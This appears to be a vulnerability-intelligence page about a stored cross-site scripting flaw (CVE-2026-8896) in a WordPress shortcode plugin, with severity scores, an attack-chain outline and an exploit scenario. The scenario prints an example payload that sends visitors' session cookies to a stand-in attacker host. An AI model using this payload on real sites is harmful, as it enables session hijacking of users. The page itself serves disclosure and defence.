Skip to main content

Mir Blocks and Shortcodes CVE-2026-8896

| EUVDEUVD-2026-38682 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-24 Wordfence GHSA-c2xc-5vpx-hhx9
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Stored XSS requires victim page-load, so UI:R is correct; all other metrics match the provided vector.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jun 24, 2026 - 07:00 vuln.today
CVE Published
Jun 24, 2026 - 05:33 cve.org
MEDIUM 6.4

DescriptionCVE.org

The MIR blocks and shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute (and other attributes such as 'ready_animation_text') of the 'msc_stats' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes inside the msc_stats() rendering function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in the Mir Blocks and Shortcodes WordPress plugin (versions up to and including 1.0.0) allows authenticated attackers with contributor-level access to permanently inject arbitrary JavaScript into pages via unsanitized shortcode attributes - specifically the 'title' and 'ready_animation_text' parameters of the msc_stats() rendering function. Any site visitor who loads an injected page executes the attacker's script in their browser, enabling session theft, credential harvesting, or in-page content manipulation. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain or register contributor-level WordPress account
Delivery
Craft msc_stats shortcode with XSS payload in 'title' attribute
Exploit
Publish or update page containing malicious shortcode
Execution
Victim visits injected page
Persist
Attacker script executes in victim browser
Impact
Exfiltrate session cookie or perform privileged actions

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold a WordPress account with at minimum contributor-level role privileges, which allows post creation and shortcode usage. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 3.1 score of 6.4 (Medium) reflects a network-reachable, low-complexity attack requiring only contributor-level privileges with no user interaction listed (UI:N) and a changed scope. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers or compromises a contributor-level account on a target WordPress site, then edits or creates a post containing the msc_stats shortcode with a malicious payload embedded in the 'title' attribute (e.g., title='<script>document.location='https://attacker.example/steal?c='+document.cookie</script>'). When any authenticated user - including administrators - visits the published page, their browser executes the script, transmitting session cookies to the attacker's server and enabling session hijacking. …
Remediation No vendor-released patch is identified at time of analysis. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-8896 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy